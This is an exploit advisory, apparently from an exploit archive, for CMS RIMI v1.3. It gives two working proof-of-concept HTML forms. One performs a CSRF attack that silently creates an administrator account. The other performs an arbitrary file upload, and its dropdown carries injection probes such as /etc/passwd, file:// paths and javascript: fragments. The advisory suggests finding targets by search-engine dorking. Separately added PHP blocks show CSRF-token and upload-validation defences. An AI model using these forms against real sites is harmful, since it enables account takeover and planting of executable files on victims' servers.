## https://sploitus.com/exploit?id=PACKETSTORM:180338
=============================================================================================================================================  
| # Title : CMS RIMI v1.3 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://github.com/myroot593/RIMICMS |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engine.  
  
[+] The following HTML code creates a new admin.  
  
[+] Go to line 9.  
  
[+] Set the target site link, save changes and apply.  
  
[+] Save code as poc.html.  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Profile User Form</title>  
</head>  
<body>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
<!-- Text input for username -->  
<label for="username">Username:</label>  
<input type="text" id="username" name="username" required>  
  
<!-- Password input for password -->  
<label for="password">Password:</label>  
<input type="password" id="password" name="password" required>  
  
<!-- Password input for confirm password -->  
<label for="confirm_password">Confirm Password:</label>  
<input type="password" id="confirm_password" name="confirm_password" required>  
  
<!-- Text input for name -->  
<label for="nama">Nama:</label>  
<input type="text" id="nama" name="nama" required>  
  
<!-- Text input for email -->  
<label for="email">Email:</label>  
<input type="email" id="email" name="email" required>  
  
<!-- Hidden input for user ID -->  
<input type="hidden" name="id" value="">  
  
<!-- Submit button -->  
<button type="submit">Submit</button>  
</form>  
</body>  
</html>  
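
The form above is accepted because the request carries nothing that a third-party page cannot supply. As an added example (not code from RIMICMS or from the advisory), a per-session CSRF token check that a state-changing admin handler such as admin/tambah-user.php could run before acting; the function names and the `csrf_token` field and session key are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: CSRF guard for a state-changing admin endpoint.
// All names below are assumptions, not part of the RIMICMS code base.

function csrf_start_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // SameSite=Strict keeps the session cookie off cross-site POSTs.
        session_set_cookie_params([
            'httponly' => true,
            'samesite' => 'Strict',
            'secure'   => !empty($_SERVER['HTTPS']),
        ]);
        session_start();
    }
}

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Emit this inside every admin <form> rendered by the application.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrf_require_valid(): void
{
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // Reject missing tokens, array-valued input, and mismatches.
    if (!is_string($sent) || !is_string($expected) || $expected === ''
        || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// At the top of the handler, before any user is created:
csrf_start_session();
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    csrf_require_valid();
}
```

A form hosted on another origin cannot read the session's token, so its POST is rejected with 403 before the account-creation logic runs.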
  
  
------------------ [+] Part 2: arbitrary file upload [+] -------------  
  
  
[+] Go to line 3.  
  
[+] Set the target site link, save changes and apply.  
  
[+] Your file : 127.0.0.1/cmsrimi/content   
  
[+] Save code as poc.html.  
  
<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
<div class="form-group ">  
<label>Judul :</label>  
<input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
<span><p class="error-form"></p></span>  
</div>  
<div class="form-group ">  
<label>Isi Berita :</label>  
<textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
<span><p class="error-form"></p></span>  
</div>  
<div class="form-group">  
<label>Kategori Berita :</label>  
<select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p>  
</div>  
<div class="form-group">  
<label>Status:</label>  
<select class="form-control" name="status_berita" id="status_berita">  
<option value="Diterbitkan">Diterbitkan</option>  
<option value="Draft">Draft</option>  
</select>  
</div>  
<div class="form-group">  
<label>Gambar Berita</label>  
<input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
<input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
<p class="error-form"></p>  
</div>  
<button type="submit" class="btn btn-primary">Submit</button>  
</form>  
<p class="error-form"></p>   
<p class="error-form"></p>  
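
On the server side, the `gambar_berita` field needs content-based validation and a server-chosen filename before anything lands in the web-served content directory. As an added example (not RIMICMS code), one way to handle that field; `store_news_image`, the allowed-type list and the size limit are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: validation for the "gambar_berita" upload field.
// Names and limits are assumptions, not part of the RIMICMS code base.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;

function store_news_image(array $file, string $uploadDir): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_string($tmp) || !is_uploaded_file($tmp)) {
        throw new RuntimeException('Upload failed');
    }
    if (filesize($tmp) > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('File too large');
    }
    // Decide the type from the file content, never from the
    // client-supplied filename or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED_IMAGE_TYPES)
        || getimagesize($tmp) === false) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted');
    }
    // Server-generated name with a fixed extension: the original
    // filename and its extension never reach the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('Could not store file');
    }
    return $name;
}

// In the handler, only when a file was actually submitted:
if (isset($_FILES['gambar_berita'])) {
    try {
        $stored = store_news_image($_FILES['gambar_berita'], __DIR__ . '/../content');
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit($e->getMessage());
    }
}
```

The upload directory should additionally be configured so the web server never executes scripts from it, since a content-type check alone does not cover files that are both a valid image and interpretable code.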
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================